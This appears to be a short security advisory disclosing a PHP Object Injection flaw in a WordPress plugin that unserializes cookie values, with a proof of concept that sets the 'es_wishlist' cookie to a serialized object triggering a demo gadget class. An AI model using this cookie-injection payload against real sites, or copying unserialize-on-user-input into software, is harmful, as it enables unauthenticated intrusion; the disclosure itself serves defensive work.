Description The plugin unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated and reload the page to see the Arbitrary deserialization message.
document.cookie='es_wishlist=O:4:"Evil":0:{}'